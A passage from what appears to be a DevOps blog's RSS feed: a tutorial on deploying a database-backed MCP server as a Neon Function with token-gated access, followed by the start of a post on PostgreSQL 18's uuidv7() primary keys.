<span class="hljs-keyword">import</span> { <span class="hljs-title class_">StreamableHTTPTransport</span> } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@hono/mcp&#x27;</span>;
<span class="hljs-keyword">import</span> { contacts } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;./db/schema&#x27;</span>;

<span class="hljs-comment">// One pool per isolate, reused across requests.</span>
<span class="hljs-keyword">const</span> db = <span class="hljs-title function_">drizzle</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">Pool</span>({ <span class="hljs-attr">connectionString</span>: process.<span class="hljs-property">env</span>.<span class="hljs-property">DATABASE_URL</span> }));

<span class="hljs-keyword">const</span> mcp = <span class="hljs-keyword">new</span> <span class="hljs-title class_">McpServer</span>({ <span class="hljs-attr">name</span>: <span class="hljs-string">&#x27;contacts&#x27;</span>, <span class="hljs-attr">version</span>: <span class="hljs-string">&#x27;1.0.0&#x27;</span> });

mcp.<span class="hljs-title function_">registerTool</span>(
  <span class="hljs-string">&#x27;search_contacts&#x27;</span>,
  {
    <span class="hljs-attr">description</span>: <span class="hljs-string">&#x27;Search contacts by name. Omit the query to list everyone.&#x27;</span>,
    <span class="hljs-attr">inputSchema</span>: { <span class="hljs-attr">query</span>: z.<span class="hljs-title function_">string</span>().<span class="hljs-title function_">optional</span>().<span class="hljs-title function_">describe</span>(<span class="hljs-string">&#x27;substring to match&#x27;</span>) },
  },
  <span class="hljs-title function_">async</span> ({ query }) =&gt; {
    <span class="hljs-keyword">const</span> rows = <span class="hljs-keyword">await</span> db
      .<span class="hljs-title function_">select</span>()
      .<span class="hljs-title function_">from</span>(contacts)
      .<span class="hljs-title function_">where</span>(query ? <span class="hljs-title function_">ilike</span>(contacts.<span class="hljs-property">name</span>, <span class="hljs-string">`%<span class="hljs-subst">${query}</span>%`</span>) : <span class="hljs-literal">undefined</span>);
    <span class="hljs-keyword">return</span> { <span class="hljs-attr">content</span>: [{ <span class="hljs-attr">type</span>: <span class="hljs-string">&#x27;text&#x27;</span>, <span class="hljs-attr">text</span>: <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>(rows) }] };
  },
);

<span class="hljs-comment">// Expose the server over streamable HTTP at /mcp.</span>
<span class="hljs-keyword">const</span> app = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Hono</span>();
<span class="hljs-keyword">const</span> transport = <span class="hljs-keyword">new</span> <span class="hljs-title class_">StreamableHTTPTransport</span>();
app.<span class="hljs-title function_">all</span>(<span class="hljs-string">&#x27;/mcp&#x27;</span>, <span class="hljs-title function_">async</span> (c) =&gt; {
  <span class="hljs-keyword">if</span> (!mcp.<span class="hljs-title function_">isConnected</span>()) <span class="hljs-keyword">await</span> mcp.<span class="hljs-title function_">connect</span>(transport);
  <span class="hljs-keyword">return</span> transport.<span class="hljs-title function_">handleRequest</span>(c);
});

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> app;
</code></pre><p>The tool handler is the interesting part. It is just a query. <code>registerTool</code> gives the agent the name, the description, and a Zod input schema (the SDK turns that into the JSON schema the model sees), and your handler returns content. The <a href="https://github.com/The-DevOps-Daily/neon-mcp-demo">companion repo</a> fills this out to full CRUD (<code>create_contact</code>, <code>update_contact</code>, <code>delete_contact</code>, <code>search_contacts</code>) against a small <code>contacts</code> table, but every tool follows this same shape: describe it, run a query, return the rows.</p>
<p>The schema is ordinary Drizzle:</p>
<pre><code class="hljs language-typescript"><span class="hljs-keyword">import</span> { pgTable, serial, text, timestamp } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;drizzle-orm/pg-core&#x27;</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">const</span> contacts = <span class="hljs-title function_">pgTable</span>(<span class="hljs-string">&#x27;contacts&#x27;</span>, {
  <span class="hljs-attr">id</span>: <span class="hljs-title function_">serial</span>(<span class="hljs-string">&#x27;id&#x27;</span>).<span class="hljs-title function_">primaryKey</span>(),
  <span class="hljs-attr">name</span>: <span class="hljs-title function_">text</span>(<span class="hljs-string">&#x27;name&#x27;</span>).<span class="hljs-title function_">notNull</span>(),
  <span class="hljs-attr">email</span>: <span class="hljs-title function_">text</span>(<span class="hljs-string">&#x27;email&#x27;</span>),
  <span class="hljs-attr">company</span>: <span class="hljs-title function_">text</span>(<span class="hljs-string">&#x27;company&#x27;</span>),
  <span class="hljs-attr">notes</span>: <span class="hljs-title function_">text</span>(<span class="hljs-string">&#x27;notes&#x27;</span>),
  <span class="hljs-attr">createdAt</span>: <span class="hljs-title function_">timestamp</span>(<span class="hljs-string">&#x27;created_at&#x27;</span>).<span class="hljs-title function_">defaultNow</span>().<span class="hljs-title function_">notNull</span>(),
});
</code></pre><p>And the function declaration that tells Neon what to deploy:</p>
<pre><code class="hljs language-typescript"><span class="hljs-comment">// neon.ts</span>
<span class="hljs-keyword">import</span> { defineConfig } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@neon/config/v1&#x27;</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> <span class="hljs-title function_">defineConfig</span>({
  <span class="hljs-attr">preview</span>: {
    <span class="hljs-attr">functions</span>: {
      <span class="hljs-attr">contacts</span>: { <span class="hljs-attr">name</span>: <span class="hljs-string">&#x27;contacts mcp server&#x27;</span>, <span class="hljs-attr">source</span>: <span class="hljs-string">&#x27;src/index.ts&#x27;</span> },
    },
  },
});
</code></pre><h2 id="h2-deploy-it-onto-the-branch" class="group relative scroll-mt-24">
        <a href="#h2-deploy-it-onto-the-branch" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Deploy it onto the branch
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-deploy-it-onto-the-branch"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The Neon CLI scaffolds the template, links (or creates) a project, pushes the schema, and deploys the function. From an empty directory:</p>
<div class="post-terminal not-prose" data-terminal="{&quot;title&quot;:&quot;deploy the MCP server&quot;,&quot;prompt&quot;:&quot;$&quot;,&quot;steps&quot;:[{&quot;comment&quot;:&quot;scaffold the mcp template&quot;},{&quot;cmd&quot;:&quot;npx neon bootstrap ./mcp-demo --template mcp&quot;,&quot;output&quot;:&quot;Scaffolded \&quot;MCP server\&quot; (23 files) into mcp-demo.&quot;},{&quot;cmd&quot;:&quot;cd mcp-demo &amp;&amp; npm install&quot;,&quot;output&quot;:&quot;added 180 packages&quot;},{&quot;comment&quot;:&quot;create + link a project in us-east-2, pulls DATABASE_URL into .env.local&quot;},{&quot;cmd&quot;:&quot;neon link&quot;,&quot;output&quot;:&quot;Created project platform-demo-mcp in aws-us-east-2 and linked branch main.&quot;},{&quot;comment&quot;:&quot;create the contacts table on the branch&quot;},{&quot;cmd&quot;:&quot;npm run db:push&quot;,&quot;output&quot;:&quot;[✓] Changes applied&quot;},{&quot;cmd&quot;:&quot;neon deploy&quot;,&quot;output&quot;:&quot;Applied changes\n  create  function:contacts\nFunction URLs\n  contacts: https://&lt;branch&gt;-contacts.compute.c-3.us-east-2.aws.neon.tech/&quot;}]}"></div><p>That last URL is the deployed MCP server. The function and the Postgres branch it queries are in the same region, <code>us-east-2</code>. The MCP endpoint is that URL plus <code>/mcp</code>. If you want to iterate before deploying, <code>neon dev</code> serves the same function locally at <code>http://localhost:8787</code> with the MCP endpoint at <code>/mcp</code>.</p>
<div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p>A Neon Function has a <strong>public HTTPS URL, reachable by anyone who has it.</strong> This example runs open for the demo, which is not acceptable for anything real: these tools read and write your database. Gate the endpoint before you share the URL.</p>
</div></div></div><p>The gate is a few lines of Hono middleware in front of <code>/mcp</code>. The repo ships it env-gated: leave <code>MCP_TOKEN</code> unset and the demo stays open, set it and every request needs the bearer token.</p>
<pre><code class="hljs language-typescript">app.<span class="hljs-title function_">use</span>(<span class="hljs-string">&#x27;/mcp&#x27;</span>, <span class="hljs-title function_">async</span> (c, next) =&gt; {
  <span class="hljs-keyword">const</span> token = process.<span class="hljs-property">env</span>.<span class="hljs-property">MCP_TOKEN</span>;
  <span class="hljs-keyword">if</span> (token &amp;&amp; c.<span class="hljs-property">req</span>.<span class="hljs-title function_">header</span>(<span class="hljs-string">&#x27;authorization&#x27;</span>) !== <span class="hljs-string">`Bearer <span class="hljs-subst">${token}</span>`</span>) {
    <span class="hljs-keyword">return</span> c.<span class="hljs-title function_">json</span>({ <span class="hljs-attr">error</span>: <span class="hljs-string">&#x27;unauthorized&#x27;</span> }, <span class="hljs-number">401</span>);
  }
  <span class="hljs-keyword">await</span> <span class="hljs-title function_">next</span>();
});
</code></pre><p>Most MCP clients can send custom headers, so the agent side is one config line (<code>Authorization: Bearer &lt;token&gt;</code>). I verified the gate directly against the app: no header and a wrong token both get a 401, the right token passes through to the transport, and with <code>MCP_TOKEN</code> unset the endpoint behaves exactly as before.</p>
<h2 id="h2-wire-up-a-client-and-watch-it-work" class="group relative scroll-mt-24">
        <a href="#h2-wire-up-a-client-and-watch-it-work" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Wire up a client and watch it work
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-wire-up-a-client-and-watch-it-work"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Any MCP client that speaks streamable HTTP can connect to <code>/mcp</code>. Here are three ways: a CLI, the SDK, and adding it to an agent.</p>
<div class="post-tabs not-prose" data-tabs="{&quot;title&quot;:&quot;Connect an MCP client to the deployed server&quot;,&quot;tabs&quot;:[{&quot;label&quot;:&quot;mcporter (CLI)&quot;,&quot;lang&quot;:&quot;bash&quot;,&quot;code&quot;:&quot;# List the tools the server advertises\nmcporter list https://&lt;branch&gt;-contacts.compute.c-3.us-east-2.aws.neon.tech/mcp --schema\n\n# Call a tool\nmcporter call \&quot;.../mcp.create_contact\&quot; name=\&quot;Ada Lovelace\&quot; company=\&quot;Analytical Engines\&quot;\nmcporter call \&quot;.../mcp.search_contacts\&quot; query=\&quot;engine\&quot;&quot;},{&quot;label&quot;:&quot;MCP SDK (Node)&quot;,&quot;lang&quot;:&quot;javascript&quot;,&quot;code&quot;:&quot;import { Client } from '@modelcontextprotocol/sdk/client/index.js';\nimport { StreamableHTTPClientTransport } from '@modelcontextprotocol/sdk/client/streamableHttp.js';\n\nconst url = new URL('https://&lt;branch&gt;-contacts.compute.c-3.us-east-2.aws.neon.tech/mcp');\nconst client = new Client({ name: 'test', version: '1.0.0' });\nawait client.connect(new StreamableHTTPClientTransport(url));\n\nconsole.log((await client.listTools()).tools.map((t) =&gt; t.name));\nconst r = await client.callTool({ name: 'search_contacts', arguments: { query: 'ada' } });\nconsole.log(r.content[0].text);&quot;},{&quot;label&quot;:&quot;Claude / Cursor&quot;,&quot;lang&quot;:&quot;bash&quot;,&quot;code&quot;:&quot;# Point an MCP-aware agent at the URL as a streamable HTTP server.\n# add-mcp writes the client config for you:\nnpx add-mcp https://&lt;branch&gt;-contacts.compute.c-3.us-east-2.aws.neon.tech/mcp -a claude\n\n# Then in the agent: \&quot;search my contacts for anyone at the Navy\&quot;&quot;}]}"></div><p>I ran the SDK client against the deployed server from a machine in Europe. The handshake and the tool calls all worked on the first try:</p>
<pre><code class="hljs language-text">connect (initialize + handshake): ~1.5 s   (cold start ~2 s the first time)
tools/list: create_contact, update_contact, delete_contact, search_contacts
create_contact: 196 ms  -&gt;  { &quot;created&quot;: { &quot;id&quot;: 1, &quot;name&quot;: &quot;Ada Lovelace&quot;, ... } }
search_contacts &quot;navy&quot;: 150 ms  -&gt;  { &quot;count&quot;: 1, &quot;contacts&quot;: [ { &quot;name&quot;: &quot;Grace Hopper&quot;, ... } ] }
</code></pre><p>A direct <code>SELECT count(*)</code> against the branch afterwards showed the rows really landed in Postgres. Nothing is held in memory; the tools are just queries.</p>
<h2 id="h2-why-co-location-is-the-point" class="group relative scroll-mt-24">
        <a href="#h2-why-co-location-is-the-point" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why co-location is the point
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-why-co-location-is-the-point"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Those tool-call numbers are around 150 to 200 milliseconds, but that is a measurement of my distance to the function, not the function&#39;s speed. I am in Europe and the function is in <code>us-east-2</code>, so each call is roughly one transatlantic round trip. An agent running near the region, or the model provider&#39;s own infrastructure calling the tool, sees a small fraction of that.</p>
<p>The number that does not move with the client&#39;s location is the hop from the function to Postgres, and that is the one co-location fixes. In the <a href="https://devops-daily.com/posts/neon-functions-compute-on-your-database-branch">first post in this series</a> I measured exactly that: a <code>SELECT</code> from inside the function against the co-located branch ran in about 1.2 ms, versus about 135 ms for the same query issued across the Atlantic.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;The hop that a database-backed MCP server actually spends its time on&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;Query from inside the Neon Function to its co-located Postgres branch, vs the same query issued cross-region (measured in the Functions #1 demo, us-east-2). Lower is better.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Function -&gt; co-located Postgres&quot;,&quot;value&quot;:1.2,&quot;series&quot;:&quot;co-located&quot;},{&quot;label&quot;:&quot;Cross-region -&gt; Postgres&quot;,&quot;value&quot;:135,&quot;series&quot;:&quot;cross-region&quot;}],&quot;series&quot;:[{&quot;name&quot;:&quot;co-located&quot;,&quot;color&quot;:&quot;#f59e0b&quot;},{&quot;name&quot;:&quot;cross-region&quot;,&quot;color&quot;:&quot;#94a3b8&quot;}]}"></div><p>A tool call that runs one or two queries inherits that difference on every invocation. Put the MCP server a region away from its database and each tool call carries an extra cross-region round trip on top of whatever the client already paid to reach the server. Put the server on the branch and that part is effectively free. For a server whose entire job is querying Postgres, that is the hop worth optimizing.</p>
<h2 id="h2-one-endpoint-per-branch" class="group relative scroll-mt-24">
        <a href="#h2-one-endpoint-per-branch" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          One endpoint per branch
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-one-endpoint-per-branch"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>There is a second thing you get for free here. Neon Functions are deployed per branch, and each branch has its own function URL. Because a branch is also a copy of your data, that means every branch can have its own MCP server over its own dataset.</p>
<p>Spin up a branch for a preview environment and it comes with an MCP endpoint backed by that branch&#39;s data. Give an agent a scratch branch to work against and it cannot touch production. Run your CI against a branch and the agent&#39;s tools operate on the ephemeral copy, then it all gets thrown away with the branch. You are not standing up and tearing down a separate MCP service per environment; the endpoint rides along with the branch you already have.</p>
<h2 id="h2-the-repo" class="group relative scroll-mt-24">
        <a href="#h2-the-repo" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The repo
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-repo"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The full example, with all four CRUD tools, the schema, the deploy config, and client test scripts, is here:</p>
<div class="post-github not-prose" data-repo="The-DevOps-Daily/neon-mcp-demo"></div><h2 id="h2-wrapping-up" class="group relative scroll-mt-24">
        <a href="#h2-wrapping-up" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Wrapping up
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-wrapping-up"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>An MCP server that fronts a database is mostly network and queries, and the network part is worth taking seriously because an agent may call these tools dozens of times in a single task. Neon Functions let you collapse the server-to-database distance to a same-region hop by deploying the MCP server onto the branch it queries, and the code to do it is small: a schema, a tool that runs a query, and the streamable HTTP transport. Point any MCP client at the URL and the agent has typed, database-backed tools running right next to the data. Give each branch its own endpoint and you get isolated, per-environment agent tooling without any extra services to run.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Stop Using Random UUIDs as Primary Keys: uuidv7() Lands in PostgreSQL 18]]></title>
      <link>https://devops-daily.com/posts/postgres-18-uuidv7-primary-keys</link>
      <description><![CDATA[Random UUIDv4 primary keys quietly wreck insert speed and bloat indexes on large tables. PostgreSQL 18 ships a native time-ordered uuidv7() that keeps the upsides of UUIDs without the B-tree penalty. Here are the numbers and how to adopt it.]]></description>
      <pubDate>Tue, 30 Jun 2026 15:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/postgres-18-uuidv7-primary-keys</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[PostgreSQL]]></category><category><![CDATA[Databases]]></category><category><![CDATA[Performance]]></category><category><![CDATA[UUID]]></category><category><![CDATA[Backend]]></category><category><![CDATA[DevOps]]></category>
      <content:encoded><![CDATA[<p>If you reach for <code>gen_random_uuid()</code> every time you need a primary key, you have probably never measured what it costs. On a small table, nothing. On a table with tens of millions of rows, random UUIDs turn every insert into a random write into the middle of your primary-key index, and that quietly drags down insert throughput, inflates index size, and burns through cache and WAL.</p>
<p>PostgreSQL 18 fixes the root cause with a native <code>uuidv7()</code> function. UUIDv7 is time-ordered, so new keys land at the right-hand edge of the B-tree like a sequential <code>bigint</code> would, while keeping the properties teams pick UUIDs for in the first place: generate them anywhere, no central sequence, no coordination. This post explains why the random version is slow, what changes with v7, the benchmark numbers on a 50-million-row table, the one real tradeoff, and how to adopt it without rewriting your schema.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li><code>uuidv4()</code> (random) primary keys scatter inserts across the whole index. On large tables that means constant page splits, low page density, fragmentation, and write amplification.</li>
<li>PostgreSQL 18 adds <code>uuidv7()</code>, a time-ordered UUID per <a href="https://datatracker.ietf.org/doc/html/rfc9562">RFC 9562</a>. New rows append at the index&#39;s right edge, like a sequential key.</li>
<li>In one published 50M-row benchmark, the initial bulk insert finished in about 1.8 minutes with v7 versus about 20 minutes with v4, and the index was roughly 25 percent smaller. Range scans by id ran about 3x faster.</li>
<li>The one real catch: a v7 value embeds its creation time, so do not hand it out as a public identifier if creation time is sensitive.</li>
<li><code>bigint</code> is still smaller and faster than any UUID. Use <code>uuidv7()</code> when you actually need UUID properties, not as a reflex.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>PostgreSQL 18 (the <code>uuidv7()</code> function is built in; no extension needed)</li>
<li>Basic familiarity with B-tree indexes and primary keys</li>
<li>A schema where you are choosing or reconsidering a primary-key type</li>
<li>Optional: <code>pg_stat_statements</code> and <code>\timing</code> if you want to measure on your own data</li>
</ul>
<h2 id="h2-why-random-uuids-are-slow-as-primary-keys" class="group relative scroll-mt-24">
        <a href="#h2-why-random-uuids-are-slow-as-primary-keys" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why random UUIDs are slow as primary keys
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-why-random-uuids-are-slow-as-primary-keys"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A primary key in PostgreSQL is backed by a B-tree index, and a B-tree stays sorted by key. Where a new key lands in that sorted structure is the whole story.</p>
<p>A <code>bigint</code> from a sequence always sorts after the previous one, so every insert lands at the right-hand edge of the tree. That rightmost page stays hot in memory, fills up, and splits cleanly. A random UUIDv4 has no order at all, so each insert lands at a random leaf page somewhere in the index.</p>
<pre><code class="hljs language-text">UUIDv4 (random)                       UUIDv7 / bigint (ordered)
inserts scatter across the tree       inserts append at the right edge

      [ root ]                              [ root ]
     /   |   \                             /   |   \
  [p1] [p2] [p3] ...                    [p1] [p2] [p3] [hot]
   ^    ^      ^                                        ^
  write write write                              every write here
  (cold pages pulled in,                         (one hot page, stays
   split, half-empty)                             in cache, fills, splits clean)
</code></pre><p>That random-write pattern has three compounding costs on a large table:</p>
<ul>
<li><strong>Page splits and low density.</strong> Inserting into the middle of a full page splits it, leaving both halves partly empty. Your index ends up larger than the data it indexes and full of slack.</li>
<li><strong>Cache misses.</strong> The working set is the entire index, not a hot tail. Once the index no longer fits in <code>shared_buffers</code>, every insert risks a random read from disk to fetch the target page.</li>
<li><strong>WAL and full-page-image amplification.</strong> The first write to a page after a checkpoint logs the whole page. More distinct pages touched per second means more full-page images and more WAL.</li>
</ul>
<p>None of this shows up at 10,000 rows. It shows up exactly when the table gets big enough to matter.</p>
<h2 id="h2-what-uuidv7-changes" class="group relative scroll-mt-24">
        <a href="#h2-what-uuidv7-changes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What uuidv7() changes
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-uuidv7-changes"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A UUIDv7 is laid out so the most significant bits are a timestamp. PostgreSQL 18 builds it from a 48-bit Unix millisecond timestamp, then a sub-millisecond fraction, then random bits, following RFC 9562. Because the timestamp is at the front and UUIDs sort lexically as 128-bit values, a v7 generated now always sorts after one generated a moment ago.</p>
<p>The result is that v7 keys behave like a sequence for index-locality purposes. Inserts append at the right edge, the hot page stays in cache, and pages fill before they split. You get the write pattern of a <code>bigint</code> with the generate-anywhere property of a UUID.</p>
<p>PostgreSQL 18 exposes three functions. The names are now explicit about the version:</p>
<pre><code class="hljs language-sql"><span class="hljs-comment">-- Version 4, random. These two are equivalent.</span>
<span class="hljs-keyword">SELECT</span> gen_random_uuid();      <span class="hljs-comment">-- 5b30857f-0bfa-48b5-ac0b-5c64e28078d1</span>
<span class="hljs-keyword">SELECT</span> uuidv4();               <span class="hljs-comment">-- b42410ee-132f-42ee-9e4f-09a6485c95b8</span>

<span class="hljs-comment">-- Version 7, time-ordered. New in PostgreSQL 18.</span>
<span class="hljs-keyword">SELECT</span> uuidv7();               <span class="hljs-comment">-- 019535d9-3df7-79fb-b466-fa907fa17f9e</span>

<span class="hljs-comment">-- Optional interval shift, handy for backfilling historical rows</span>
<span class="hljs-comment">-- with timestamps in the past.</span>
<span class="hljs-keyword">SELECT</span> uuidv7(shift <span class="hljs-operator">=</span><span class="hljs-operator">&gt;</span> <span class="hljs-string">&#x27;-7 days&#x27;</span>::<span class="hljs-type">interval</span>);
</code></pre><p>One useful detail: within a single backend session, PostgreSQL guarantees each <code>uuidv7()</code> it generates is strictly greater than the last, by spending some of the random bits on extra clock precision. So even a tight insert loop produces monotonic keys rather than occasionally colliding on the same millisecond.</p>
<h2 id="h2-the-numbers" class="group relative scroll-mt-24">
